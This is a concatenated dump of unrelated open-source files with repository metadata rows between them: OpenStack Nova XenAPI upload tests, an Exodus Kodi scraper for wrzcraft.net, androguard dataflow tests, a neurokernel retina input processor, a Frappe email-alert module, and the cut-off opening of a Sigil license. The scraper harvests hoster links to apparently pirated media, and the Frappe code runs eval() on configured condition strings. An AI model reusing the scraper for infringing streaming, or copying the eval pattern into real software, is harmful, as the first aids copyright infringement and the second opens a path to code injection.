mock_call_plugin_serialized.assert_has_calls(calls)
mock_log_debug.assert_has_calls(log_calls, any_order=True)
self.assertEqual(1, mock_fault.call_count)
def _get_upload_params(self, auto_disk_config=True,
expected_os_type='default'):
params = self._get_params()
params['vdi_uuids'] = ['fake_vdi_uuid']
params['properties'] = {'auto_disk_config': auto_disk_config,
'os_type': expected_os_type}
return params
def _test_upload_image(self, auto_disk_config, expected_os_type='default'):
params = self._get_upload_params(auto_disk_config, expected_os_type)
self.mox.StubOutWithMock(self.session, 'call_plugin_serialized')
self.session.call_plugin_serialized('glance', 'upload_vhd', **params)
self.mox.ReplayAll()
self.store.upload_image(self.context, self.session, self.instance,
'fake_image_uuid', ['fake_vdi_uuid'])
self.mox.VerifyAll()
def test_upload_image(self):
self._test_upload_image(True)
def test_upload_image_None_os_type(self):
self.instance['os_type'] = None
self._test_upload_image(True, 'linux')
def test_upload_image_no_os_type(self):
del self.instance['os_type']
self._test_upload_image(True, 'linux')
def test_upload_image_auto_config_disk_disabled(self):
sys_meta = [{"key": "image_auto_disk_config", "value": "Disabled"}]
self.instance["system_metadata"] = sys_meta
self._test_upload_image("disabled")
def test_upload_image_raises_exception(self):
params = self._get_upload_params()
self.mox.StubOutWithMock(self.session, 'call_plugin_serialized')
self.session.call_plugin_serialized('glance', 'upload_vhd',
**params).AndRaise(RuntimeError)
self.mox.ReplayAll()
self.assertRaises(RuntimeError, self.store.upload_image,
self.context, self.session, self.instance,
'fake_image_uuid', ['fake_vdi_uuid'])
self.mox.VerifyAll()
def test_upload_image_retries_then_raises_exception(self):
self.flags(num_retries=2, group='glance')
params = self._get_upload_params()
self.mox.StubOutWithMock(self.session, 'call_plugin_serialized')
self.mox.StubOutWithMock(time, 'sleep')
self.mox.StubOutWithMock(compute_utils, 'add_instance_fault_from_exc')
error_details = ["", "", "RetryableError", ""]
error = self.session.XenAPI.Failure(details=error_details)
self.session.call_plugin_serialized('glance', 'upload_vhd',
**params).AndRaise(error)
compute_utils.add_instance_fault_from_exc(self.context, self.instance,
error, (fake.Failure,
error,
mox.IgnoreArg()))
time.sleep(0.5)
self.session.call_plugin_serialized('glance', 'upload_vhd',
**params).AndRaise(error)
compute_utils.add_instance_fault_from_exc(self.context, self.instance,
error, (fake.Failure,
error,
mox.IgnoreArg()))
time.sleep(1)
self.session.call_plugin_serialized('glance', 'upload_vhd',
**params).AndRaise(error)
compute_utils.add_instance_fault_from_exc(self.context, self.instance,
error, (fake.Failure,
error,
mox.IgnoreArg()))
self.mox.ReplayAll()
self.assertRaises(exception.CouldNotUploadImage,
self.store.upload_image,
self.context, self.session, self.instance,
'fake_image_uuid', ['fake_vdi_uuid'])
self.mox.VerifyAll()
def test_upload_image_retries_on_signal_exception(self):
self.flags(num_retries=2, group='glance')
params = self._get_upload_params()
self.mox.StubOutWithMock(self.session, 'call_plugin_serialized')
self.mox.StubOutWithMock(time, 'sleep')
self.mox.StubOutWithMock(compute_utils, 'add_instance_fault_from_exc')
error_details = ["", "task signaled", "", ""]
error = self.session.XenAPI.Failure(details=error_details)
self.session.call_plugin_serialized('glance', 'upload_vhd',
**params).AndRaise(error)
compute_utils.add_instance_fault_from_exc(self.context, self.instance,
error, (fake.Failure,
error,
mox.IgnoreArg()))
time.sleep(0.5)
# Note(johngarbutt) XenServer 6.1 and later has this error
error_details = ["", "signal: SIGTERM", "", ""]
error = self.session.XenAPI.Failure(details=error_details)
self.session.call_plugin_serialized('glance', 'upload_vhd',
**params).AndRaise(error)
compute_utils.add_instance_fault_from_exc(self.context, self.instance,
error, (fake.Failure,
error,
mox.IgnoreArg()))
time.sleep(1)
self.session.call_plugin_serialized('glance', 'upload_vhd',
**params)
self.mox.ReplayAll()
self.store.upload_image(self.context, self.session, self.instance,
'fake_image_uuid', ['fake_vdi_uuid'])
self.mox.VerifyAll()
| apache-2.0 | 5,720,992,741,060,890,000 | 44.429688 | 79 | 0.527945 | false |
repotvsupertuga/repo | instal/script.module.stream.tvsupertuga.addon/resources/lib/sources/en/wrzcraft.py | 8 | 6752 | # -*- coding: utf-8 -*-
'''
Exodus Add-on
Copyright (C) 2016 Exodus
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,urlparse
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import debrid
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['wrzcraft.net']
self.base_link = 'http://wrzcraft.net'
self.search_link = '/search/%s/feed/rss2/'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = {'imdb': imdb, 'title': title, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
url = {'imdb': imdb, 'tvdb': tvdb, 'tvshowtitle': tvshowtitle, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if url == None: return
url = urlparse.parse_qs(url)
url = dict([(i, url[i][0]) if url[i] else (i, '') for i in url])
url['title'], url['premiered'], url['season'], url['episode'] = title, premiered, season, episode
url = urllib.urlencode(url)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url == None: return sources
if debrid.status() == False: raise Exception()
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
title = data['tvshowtitle'] if 'tvshowtitle' in data else data['title']
hdlr = 'S%02dE%02d' % (int(data['season']), int(data['episode'])) if 'tvshowtitle' in data else data['year']
query = '%s S%02dE%02d' % (data['tvshowtitle'], int(data['season']), int(data['episode'])) if 'tvshowtitle' in data else '%s %s' % (data['title'], data['year'])
query = re.sub('(\\\|/| -|:|;|\*|\?|"|\'|<|>|\|)', ' ', query)
url = self.search_link % urllib.quote_plus(query)
url = urlparse.urljoin(self.base_link, url)
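# Illustrative example of the resulting feed URL (hypothetical title): for the query
# "Movie Title 2016" this builds http://wrzcraft.net/search/Movie+Title+2016/feed/rss2/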
r = client.request(url)
posts = client.parseDOM(r, 'item')
hostDict = hostprDict + hostDict
items = []
for post in posts:
try:
t = client.parseDOM(post, 'title')[0]
c = client.parseDOM(post, 'content.+?')[0]
u = client.parseDOM(c, 'p')
u = [client.parseDOM(i, 'a', ret='href') for i in u]
u = [i[0] for i in u if len(i) == 1]
if not u: raise Exception()
if 'tvshowtitle' in data:
u = [(re.sub('(720p|1080p)', '', t) + ' ' + [x for x in i.strip('//').split('/')][-1], i) for i in u]
else:
u = [(t, i) for i in u]
items += u
except:
pass
for item in items:
try:
name = item[0]
name = client.replaceHTMLCodes(name)
t = re.sub('(\.|\(|\[|\s)(\d{4}|S\d*E\d*|S\d*|3D)(\.|\)|\]|\s|)(.+|)', '', name)
if not cleantitle.get(t) == cleantitle.get(title): raise Exception()
y = re.findall('[\.|\(|\[|\s](\d{4}|S\d*E\d*|S\d*)[\.|\)|\]|\s]', name)[-1].upper()
if not y == hdlr: raise Exception()
fmt = re.sub('(.+)(\.|\(|\[|\s)(\d{4}|S\d*E\d*|S\d*)(\.|\)|\]|\s)', '', name.upper())
fmt = re.split('\.|\(|\)|\[|\]|\s|\-', fmt)
fmt = [i.lower() for i in fmt]
if any(i.endswith(('subs', 'sub', 'dubbed', 'dub')) for i in fmt): raise Exception()
if any(i in ['extras'] for i in fmt): raise Exception()
if '1080p' in fmt: quality = '1080p'
elif '720p' in fmt: quality = 'HD'
else: quality = 'SD'
if any(i in ['dvdscr', 'r5', 'r6'] for i in fmt): quality = 'SCR'
elif any(i in ['camrip', 'tsrip', 'hdcam', 'hdts', 'dvdcam', 'dvdts', 'cam', 'telesync', 'ts'] for i in fmt): quality = 'CAM'
info = []
if '3d' in fmt: info.append('3D')
try:
size = re.findall('((?:\d+\.\d+|\d+\,\d+|\d+) (?:GB|GiB|MB|MiB))', item[2])[-1]
div = 1 if size.endswith(('GB', 'GiB')) else 1024
size = float(re.sub('[^0-9|/.|/,]', '', size))/div
size = '%.2f GB' % size
info.append(size)
except:
pass
if any(i in ['hevc', 'h265', 'x265'] for i in fmt): info.append('HEVC')
info = ' | '.join(info)
url = item[1]
if any(x in url for x in ['.rar', '.zip', '.iso']): raise Exception()
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
host = re.findall('([\w]+[.][\w]+)$', urlparse.urlparse(url.strip().lower()).netloc)[0]
if not host in hostDict: raise Exception()
host = client.replaceHTMLCodes(host)
host = host.encode('utf-8')
sources.append({'source': host, 'quality': quality, 'language': 'en', 'url': url, 'info': info, 'direct': False, 'debridonly': True})
except:
pass
check = [i for i in sources if not i['quality'] == 'CAM']
if check: sources = check
return sources
except:
return sources
def resolve(self, url):
return url
| gpl-2.0 | -5,193,886,154,355,285,000 | 35.497297 | 172 | 0.475118 | false |
zyrikby/androguard | androguard/decompiler/dad/tests/dataflow_test.py | 14 | 14248 | """Tests for def_use."""
import sys
sys.path.append('.')
import collections
import mock
import unittest
from androguard.decompiler.dad import dataflow
from androguard.decompiler.dad import graph
from androguard.decompiler.dad import node
from androguard.decompiler.dad import instruction
from androguard.decompiler.dad import basic_blocks
class DataflowTest(unittest.TestCase):
def _CreateMockIns(self, uses, lhs=None):
mock_ins = mock.create_autospec(instruction.IRForm)
mock_ins.get_used_vars.return_value = uses
mock_ins.get_lhs.return_value = lhs
return mock_ins
def _CreateMockNode(self, node_name, start_ins_idx, lins):
mock_node = mock.create_autospec(
basic_blocks.BasicBlock,
_name=node_name)
mock_node.__repr__ = mock.Mock(return_value=node_name)
loc_ins = []
ins_idx = start_ins_idx
for ins in lins:
uses, lhs = ins
mock_ins = self._CreateMockIns(uses)
mock_ins.get_lhs.return_value = lhs
loc_ins.append((ins_idx, mock_ins))
ins_idx += 1
mock_node.get_loc_with_ins.return_value = loc_ins
return mock_node
def _CreateMockGraph(self, lparams, lidx_ins):
entry = mock.create_autospec(basic_blocks.BasicBlock)
rpo = [entry]
node_num = 1
for idx, lins in lidx_ins:
rpo.append(self._CreateMockNode('n%d' % node_num, idx, lins))
node_num += 1
G = mock.create_autospec(graph.Graph)
G.rpo = rpo
return G
"""
This tests the reach def analysis with:
int GCD(int a, int b){
node1:
0. int c = a;
1. int d = b;
node2:
2. if(c == 0)
node3:
3. ret = d; (goto 9.)
node4:
4. while(d != 0){
node5
5. if(c > d)
node6:
6. c = c - d;
node7: else
7. d = d - c;
node8: }
8. ret = c;
node9:
9. return ret;
}
"""
def testReachDefGCD(self):
n1 = self._CreateMockNode('n1', 0, [(['a'], 'c'), (['b'], 'd')])
n2 = self._CreateMockNode('n2', 2, [(['c'], None)])
n3 = self._CreateMockNode('n3', 3, [(['d'], 'ret')])
n4 = self._CreateMockNode('n4', 4, [(['d'], None)])
n5 = self._CreateMockNode('n5', 5, [(['c', 'd'], None)])
n6 = self._CreateMockNode('n6', 6, [(['c', 'd'], 'c')])
n7 = self._CreateMockNode('n7', 7, [(['c', 'd'], 'd')])
n8 = self._CreateMockNode('n8', 8, [(['c'], 'ret')])
n9 = self._CreateMockNode('n9', 9, [(['ret'], None)])
sucs = {
n1: [n2],
n2: [n3, n4],
n3: [n9],
n4: [n5, n8],
n5: [n6, n7],
n6: [n8],
n7: [n8],
n8: [n9]
}
preds = collections.defaultdict(list)
for pred, lsucs in sucs.iteritems():
for suc in lsucs:
preds[suc].append(pred)
def add_edge(x, y):
sucs.setdefault(x, []).append(y)
preds.setdefault(y, []).append(x)
graph_mock = mock.create_autospec(graph.Graph)
graph_mock.entry = n1
graph_mock.exit = n9
graph_mock.rpo = [n1, n2, n3, n4, n5, n6, n7, n8, n9]
graph_mock.all_preds.side_effect = lambda x: preds[x]
graph_mock.all_sucs.side_effect = lambda x: sucs.get(x, [])
graph_mock.add_edge.side_effect = add_edge
with mock.patch.object(dataflow, 'DummyNode') as dummynode_mock:
dummy_entry_mock = mock.Mock(name='entry')
dummy_exit_mock = mock.Mock(name='exit')
for dummy_mock in dummy_entry_mock, dummy_exit_mock:
dummy_mock.get_loc_with_ins.return_value = []
dummynode_mock.side_effect = [dummy_entry_mock, dummy_exit_mock]
analysis = dataflow.reach_def_analysis(graph_mock, set(['a', 'b']))
expected_A = {
dummy_entry_mock: set([-2, -1]),
n1: set([-2, -1, 0, 1]),
n2: set([-2, -1, 0, 1]),
n3: set([-2, -1, 0, 1, 3]),
n4: set([-2, -1, 0, 1]),
n5: set([-2, -1, 0, 1]),
n6: set([-2, -1, 1, 6]),
n7: set([-2, -1, 0, 7]),
n8: set([-2, -1, 0, 1, 6, 7, 8]),
n9: set([-2, -1, 0, 1, 3, 6, 7, 8]),
dummy_exit_mock: set([-2, -1, 0, 1, 3, 6, 7, 8])
}
expected_R = {
n1: set([-2, -1]),
n2: set([-2, -1, 0, 1]),
n3: set([-2, -1, 0, 1]),
n4: set([-2, -1, 0, 1]),
n5: set([-2, -1, 0, 1]),
n6: set([-2, -1, 0, 1]),
n7: set([-2, -1, 0, 1]),
n8: set([-2, -1, 0, 1, 6, 7]),
n9: set([-2, -1, 0, 1, 3, 6, 7, 8]),
dummy_exit_mock: set([-2, -1, 0, 1, 3, 6, 7, 8])
}
expected_def_to_loc = {
'a': set([-1]),
'b': set([-2]),
'c': set([0, 6]),
'd': set([1, 7]),
'ret': set([3, 8])
}
self.assertDictEqual(analysis.A, expected_A)
self.assertDictEqual(analysis.R, expected_R)
self.assertDictEqual(analysis.def_to_loc, expected_def_to_loc)
@mock.patch.object(dataflow, 'reach_def_analysis')
def testDefUseGCD(self, mock_reach_def):
"""Test def use with the GCD function above."""
n1 = self._CreateMockNode('n1', 0, [(['a'], 'c'), (['b'], 'd')])
n2 = self._CreateMockNode('n2', 2, [(['c'], None)])
n3 = self._CreateMockNode('n3', 3, [(['d'], 'ret')])
n4 = self._CreateMockNode('n4', 4, [(['d'], None)])
n5 = self._CreateMockNode('n5', 5, [(['c', 'd'], None)])
n6 = self._CreateMockNode('n6', 6, [(['c', 'd'], 'c')])
n7 = self._CreateMockNode('n7', 7, [(['c', 'd'], 'd')])
n8 = self._CreateMockNode('n8', 8, [(['c'], 'ret')])
n9 = self._CreateMockNode('n9', 9, [(['ret'], None)])
graph_mock = mock.create_autospec(graph.Graph)
graph_mock.rpo = [n1, n2, n3, n4, n5, n6, n7, n8, n9]
mock_analysis = mock_reach_def.return_value
mock_analysis.def_to_loc = {
'a': set([-1]),
'b': set([-2]),
'c': set([0, 6]),
'd': set([1, 7]),
'ret': set([3, 8])
}
mock_analysis.defs = {
n1: {'c': set([0]),
'd': set([1])},
n2: {},
n3: {'ret': set([3])},
n4: {},
n5: {},
n6: {'c': set([6])},
n7: {'d': set([7])},
n8: {'ret': set([8])},
n9: {}
}
mock_analysis.R = {
n1: set([-2, -1]),
n2: set([-2, -1, 0, 1]),
n3: set([-2, -1, 0, 1]),
n4: set([-2, -1, 0, 1]),
n5: set([-2, -1, 0, 1]),
n6: set([-2, -1, 0, 1]),
n7: set([-2, -1, 0, 1]),
n8: set([-2, -1, 0, 1, 6, 7]),
n9: set([-2, -1, 0, 1, 3, 6, 7, 8])
}
expected_du = {
('a', -1): [0],
('b', -2): [1],
('c', 0): [2, 5, 6, 7, 8],
('c', 6): [8],
('d', 1): [3, 4, 5, 6, 7],
('ret', 3): [9],
('ret', 8): [9]
}
expected_ud = {
('a', 0): [-1],
('b', 1): [-2],
('c', 2): [0],
('c', 5): [0],
('c', 6): [0],
('c', 7): [0],
('c', 8): [0, 6],
('d', 3): [1],
('d', 4): [1],
('d', 5): [1],
('d', 6): [1],
('d', 7): [1],
('ret', 9): [3, 8]
}
ud, du = dataflow.build_def_use(graph_mock, mock.sentinel)
self.assertItemsEqual(du, expected_du)
for entry in du:
self.assertItemsEqual(du[entry], expected_du[entry])
self.assertItemsEqual(ud, expected_ud)
for entry in ud:
self.assertItemsEqual(ud[entry], expected_ud[entry])
@mock.patch.object(dataflow, 'reach_def_analysis')
def testDefUseIfBool(self, mock_reach_def):
n1 = self._CreateMockNode('n1', 0, [([], 0), ([2], None)])
n2 = self._CreateMockNode('n1', 2, [([3], None)])
n3 = self._CreateMockNode('n3', 3, [([3], None)])
n4 = self._CreateMockNode('n4', 4, [([], 0)])
n5 = self._CreateMockNode('n5', 5, [([0], 0)])
n6 = self._CreateMockNode('n6', 6, [([2], 1), ([0, 1], 0)])
n7 = self._CreateMockNode('n7', 8, [([0], None)])
graph_mock = mock.create_autospec(graph.Graph)
graph_mock.rpo = [n1, n2, n3, n4, n5, n6, n7]
mock_analysis = mock_reach_def.return_value
mock_analysis.def_to_loc = {
0: set([0, 4, 5, 7]),
1: set([6]),
2: set([-1]),
3: set([-2])
}
mock_analysis.defs = {
n1: {0: set([0])},
n2: {},
n3: {},
n4: {0: set([4])},
n5: {0: set([5])},
n6: {0: set([7]),
1: set([6])},
n7: {}
}
mock_analysis.R = {
n1: set([-1, -2]),
n2: set([0, -2, -1]),
n3: set([0, -1, -2]),
n4: set([0, -2, -1]),
n5: set([0, -2, -1]),
n6: set([0, -1, -2]),
n7: set([4, -1, 6, 7, -2, 5])
}
expected_du = {
(0, 0): [7, 5],
(0, 4): [8],
(0, 5): [8],
(0, 7): [8],
(1, 6): [7],
(2, -1): [6, 1],
(3, -2): [2, 3]
}
expected_ud = {
(0, 5): [0],
(0, 7): [0],
(0, 8): [4, 5, 7],
(1, 7): [6],
(2, 1): [-1],
(2, 6): [-1],
(3, 2): [-2],
(3, 3): [-2]
}
ud, du = dataflow.build_def_use(graph_mock, mock.sentinel)
self.assertEqual(du, expected_du)
self.assertEqual(ud, expected_ud)
def testGroupVariablesGCD(self):
du = {
('a', -1): [0],
('b', -2): [1],
('c', 0): [2, 5, 6, 7, 8],
('c', 6): [8],
('d', 1): [3, 4, 5, 6, 7],
('ret', 3): [9],
('ret', 8): [9]
}
ud = {
('a', 0): [-1],
('b', 1): [-2],
('c', 2): [0],
('c', 5): [0],
('c', 6): [0],
('c', 7): [0],
('c', 8): [0, 6],
('d', 3): [1],
('d', 4): [1],
('d', 5): [1],
('d', 6): [1],
('d', 7): [1],
('ret', 9): [3, 8]
}
expected_groups = {
'a': [([-1], [0])],
'b': [([-2], [1])],
'c': [([0, 6], [8, 2, 5, 6, 7])],
'd': [([1], [3, 4, 5, 6, 7])],
'ret': [([3, 8], [9])]
}
groups = dataflow.group_variables(['a', 'b', 'c', 'd', 'ret'], du, ud)
self.assertEqual(groups, expected_groups)
def testGroupVariablesIfBool(self):
du = {
(0, 0): [7, 5],
(0, 4): [8],
(0, 5): [8],
(0, 7): [8],
(1, 6): [7],
(2, -1): [6, 1],
(3, -2): [2, 3]
}
ud = {
(0, 5): [0],
(0, 7): [0],
(0, 8): [4, 5, 7],
(1, 7): [6],
(2, 1): [-1],
(2, 6): [-1],
(3, 2): [-2],
(3, 3): [-2]
}
groups = dataflow.group_variables([0, 1, 2, 3], du, ud)
expected_groups = {
0: [([0], [5, 7]), ([4, 5, 7], [8])],
1: [([6], [7])],
2: [([-1], [1, 6])],
3: [([-2], [2, 3])]
}
self.assertItemsEqual(groups, expected_groups)
for entry in groups:
self.assertItemsEqual(groups[entry], expected_groups[entry])
@mock.patch.object(dataflow, 'group_variables')
def testSplitVariablesGCD(self, group_variables_mock):
group = {
'a': [([-1], [0])],
'b': [([-2], [1])],
'c': [([0, 6], [2, 5, 6, 7, 8])],
'd': [([1], [3, 4, 5, 6, 7])],
'ret': [([3, 8], [9])]
}
group_variables_mock.return_value = group
dataflow.split_variables(
mock.sentinel, [0, 1, 2, 3, 4], mock.sentinel, mock.sentinel)
@mock.patch.object(dataflow, 'group_variables')
def testSplitVariablesIfBool(self, group_variables_mock):
group = {
0: [([0], [5, 7]), ([4, 5, 7], [8])],
1: [([6], [7])],
2: [([-1], [1, 6])],
3: [([-2], [2, 3])]
}
group_variables_mock.return_value = group
param1_mock = mock.Mock()
param2_mock = mock.Mock()
var0_mock = mock.Mock()
var1_mock = mock.Mock()
lvars = {0: var0_mock, 1: var1_mock, 2: param1_mock, 3: param2_mock}
du = {
(0, 0): [7, 5],
(0, 4): [8],
(0, 5): [8],
(0, 7): [8],
(1, 6): [7],
(2, -1): [6, 1],
(3, -2): [2, 3]
}
ud = {
(0, 5): [0],
(0, 7): [0],
(0, 8): [4, 5, 7],
(1, 7): [6],
(2, 1): [-1],
(2, 6): [-1],
(3, 2): [-2],
(3, 3): [-2]
}
graph_mock = mock.Mock()
dataflow.split_variables(graph_mock, lvars, du, ud)
expected_du = {
(1, 6): [7],
(2, -1): [6, 1],
(3, -2): [2, 3],
(4, 0): [7, 5],
(5, 4): [8],
(5, 5): [8],
(5, 7): [8]
}
expected_ud = {
(1, 7): [6],
(2, 1): [-1],
(2, 6): [-1],
(3, 2): [-2],
(3, 3): [-2],
(4, 5): [0],
(4, 7): [0],
(5, 8): [4, 5, 7]
}
self.assertEqual(du, expected_du)
self.assertEqual(ud, expected_ud)
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 8,023,422,970,382,853,000 | 31.381818 | 79 | 0.380685 | false |
neurokernel/retina | retina/InputProcessors/RetinaInputProcessor.py | 1 | 4648 | #!/usr/bin/env python
import numpy as np
import h5py
from neurokernel.LPU.utils.simpleio import *
import retina.classmapper as cls_map
import pycuda.driver as cuda
from neurokernel.LPU.InputProcessors.BaseInputProcessor import BaseInputProcessor
class RetinaInputProcessor(BaseInputProcessor):
def __init__(self, config, retina):
self.config = config
self.screen_type = config['Retina']['screentype']
self.filtermethod = config['Retina']['filtermethod']
screen_cls = cls_map.get_screen_cls(self.screen_type)
self.screen = screen_cls(config)
self.retina = retina
uids = ['neuron_{}_{}_photon'.format(name, i) for i in range(retina.num_elements)
for name in ['R1', 'R2', 'R3', 'R4', 'R5', 'R6']]
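# e.g. 'neuron_R1_0_photon', 'neuron_R2_0_photon', ..., 'neuron_R6_0_photon', then the
# same six names for element 1, and so on (illustrative expansion of the comprehension above)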
super(RetinaInputProcessor, self).__init__([('photon',uids)], mode=0)
def pre_run(self):
self.generate_receptive_fields()
self.generate_datafiles()
self.input_file_handle = h5py.File(self.input_file, 'w')
self.input_file_handle.create_dataset('metadata', (), 'i')
self.input_file_handle['metadata'].attrs['dt'] = self.config['General']['dt']
self.input_file_handle['metadata'].attrs['screentype'] = self.config['Retina']['screentype']
self.input_file_handle['metadata'].attrs['rings'] = self.config['Retina']['rings']
self.input_file_handle['metadata'].attrs['dt'] = self.config['Retina']['intype']
self.input_file_handle.create_dataset(
'photon/data',
(0, self.retina.num_photoreceptors),
dtype=np.float64,
maxshape=(None, self.retina.num_photoreceptors))
self.input_file_handle.create_dataset(
'photon/uids',
data=np.array(self.variables['photon']['uids'], dtype = 'S'))
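# Illustrative only: the file written above can later be read back with plain h5py
# (the file name here is assumed):
#
#     with h5py.File('retina_input.h5', 'r') as f:
#         photons = f['photon/data'][:]   # shape (n_steps, num_photoreceptors)
#         uids = f['photon/uids'][:]      # matching neuron uids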
def generate_datafiles(self):
screen = self.screen
retina = self.retina
config = self.config
rfs = self.rfs
screen.setup_file('intensities.h5')
retina_elev_file = 'retina_elev.h5'
retina_azim_file = 'retina_azim.h5'
screen_dima_file = 'grid_dima.h5'
screen_dimb_file = 'grid_dimb.h5'
retina_dima_file = 'retina_dima.h5'
retina_dimb_file = 'retina_dimb.h5'
self.input_file = '{}.h5'.format(config['Retina']['input_file'])
elev_v, azim_v = retina.get_ommatidia_pos()
for data, filename in [(elev_v, retina_elev_file),
(azim_v, retina_azim_file),
(screen.grid[0], screen_dima_file),
(screen.grid[1], screen_dimb_file),
(rfs.refa, retina_dima_file),
(rfs.refb, retina_dimb_file)]:
write_array(data, filename)
self.file_open = False
def generate_receptive_fields(self):
#TODO intensities file should also be written but is omitted for
# performance reasons
retina = self.retina
screen = self.screen
screen_type = self.screen_type
filtermethod = self.filtermethod
mapdr_cls = cls_map.get_mapdr_cls(screen_type)
projection_map = mapdr_cls.from_retina_screen(retina, screen)
rf_params = projection_map.map(*retina.get_all_photoreceptors_dir())
if np.isnan(np.sum(rf_params)):
print('Warning, Nan entry in array of receptive field centers')
if filtermethod == 'gpu':
vrf_cls = cls_map.get_vrf_cls(screen_type)
else:
vrf_cls = cls_map.get_vrf_no_gpu_cls(screen_type)
rfs = vrf_cls(screen.grid)
rfs.load_parameters(refa=rf_params[0], refb=rf_params[1],
acceptance_angle=retina.get_angle(),
radius=screen.radius)
rfs.generate_filters()
self.rfs = rfs
def update_input(self):
im = self.screen.get_screen_intensity_steps(1)
# reshape needed so the inputs can be written to the file as a flat array
inputs = self.rfs.filter_image_use(im).get().reshape((-1))
self.input_file_handle['photon/data'].resize(
(self.input_file_handle['photon/data'].shape[0]+1,
len(self.variables['photon']['uids'])))
self.input_file_handle['photon/data'][-1,:] = inputs
self.variables['photon']['input'][:] = inputs
def is_input_available(self):
return True
def post_run(self):
self.input_file_handle.close()
def __del__(self):
try:
self.input_file_handle.close()
except:
pass
| bsd-3-clause | -5,776,355,278,828,769,000 | 35.888889 | 100 | 0.584552 | false |
sbkolate/sap_frappe_v6 | frappe/email/doctype/email_alert/email_alert.py | 3 | 4011 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
import json
from frappe import _
from frappe.model.document import Document
from frappe.utils import validate_email_add, nowdate
class EmailAlert(Document):
def validate(self):
if self.event in ("Days Before", "Days After") and not self.date_changed:
frappe.throw(_("Please specify which date field must be checked"))
if self.event=="Value Change" and not self.value_changed:
frappe.throw(_("Please specify which value field must be checked"))
forbidden_document_types = ("Bulk Email",)
if (self.document_type in forbidden_document_types
or frappe.get_meta(self.document_type).istable):
# currently email alerts don't work on child tables, as events are not fired for each record of a child table
frappe.throw(_("Cannot set Email Alert on Document Type {0}").format(self.document_type))
def trigger_daily_alerts():
trigger_email_alerts(None, "daily")
def trigger_email_alerts(doc, method=None):
if frappe.flags.in_import or frappe.flags.in_patch:
# don't send email alerts while syncing or patching
return
if method == "daily":
for alert in frappe.db.sql_list("""select name from `tabEmail Alert`
where event in ('Days Before', 'Days After') and enabled=1"""):
alert = frappe.get_doc("Email Alert", alert)
diff_days = alert.days_in_advance
if alert.event=="Days After":
diff_days = -diff_days
for name in frappe.db.sql_list("""select name from `tab{0}` where
DATE({1}) = ADDDATE(DATE(%s), INTERVAL %s DAY)""".format(alert.document_type, alert.date_changed),
(nowdate(), diff_days or 0)):
evaluate_alert(frappe.get_doc(alert.document_type, name),
alert, alert.event)
else:
if method in ("on_update", "validate") and doc.flags.in_insert:
# don't call email alerts multiple times for inserts
# on insert only "New" type alert must be called
return
eevent = {
"on_update": "Save",
"after_insert": "New",
"validate": "Value Change",
"on_submit": "Submit",
"on_cancel": "Cancel",
}[method]
for alert in frappe.db.sql_list("""select name from `tabEmail Alert`
where document_type=%s and event=%s and enabled=1""", (doc.doctype, eevent)):
evaluate_alert(doc, alert, eevent)
def evaluate_alert(doc, alert, event):
if isinstance(alert, basestring):
alert = frappe.get_doc("Email Alert", alert)
context = {"doc": doc, "nowdate": nowdate}
if alert.condition:
if not eval(alert.condition, context):
return
if event=="Value Change" and not doc.is_new():
if doc.get(alert.value_changed) == frappe.db.get_value(doc.doctype,
doc.name, alert.value_changed):
return # value not changed
for recipient in alert.recipients:
recipients = []
if recipient.condition:
if not eval(recipient.condition, context):
continue
if recipient.email_by_document_field:
if validate_email_add(doc.get(recipient.email_by_document_field)):
recipients.append(doc.get(recipient.email_by_document_field))
# else:
# print "invalid email"
if recipient.cc:
recipient.cc = recipient.cc.replace(",", "\n")
recipients = recipients + recipient.cc.split("\n")
if not recipients:
return
subject = alert.subject
if event != "Value Change" and not doc.is_new():
# reload the doc for the latest values & comments,
# except for validate type event.
doc = frappe.get_doc(doc.doctype, doc.name)
context = {"doc": doc, "alert": alert, "comments": None}
if doc.get("_comments"):
context["comments"] = json.loads(doc.get("_comments"))
if "{" in subject:
subject = frappe.render_template(alert.subject, context)
frappe.sendmail(recipients=recipients, subject=subject,
message= frappe.render_template(alert.message, context),
bulk=True, reference_doctype = doc.doctype, reference_name = doc.name,
attachments = [frappe.attach_print(doc.doctype, doc.name)] if alert.attach_print else None)
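# Illustrative example of the strings evaluated above (field names are hypothetical):
# an Email Alert with condition 'doc.status == "Open"' and a recipient condition
# 'doc.owner != "Administrator"' would each be eval()'d against
# context = {"doc": doc, "nowdate": nowdate}.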
| mit | 2,750,044,336,936,229,400 | 32.705882 | 109 | 0.704562 | false |
Dave-ts/Sigil | src/Resource_Files/plugin_launchers/python/validationcontainer.py | 9 | 2091 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Copyright (c) 2014 Kevin B. Hendricks, John Schember, and Doug Massay
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of
# conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list
# of conditions and the following disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
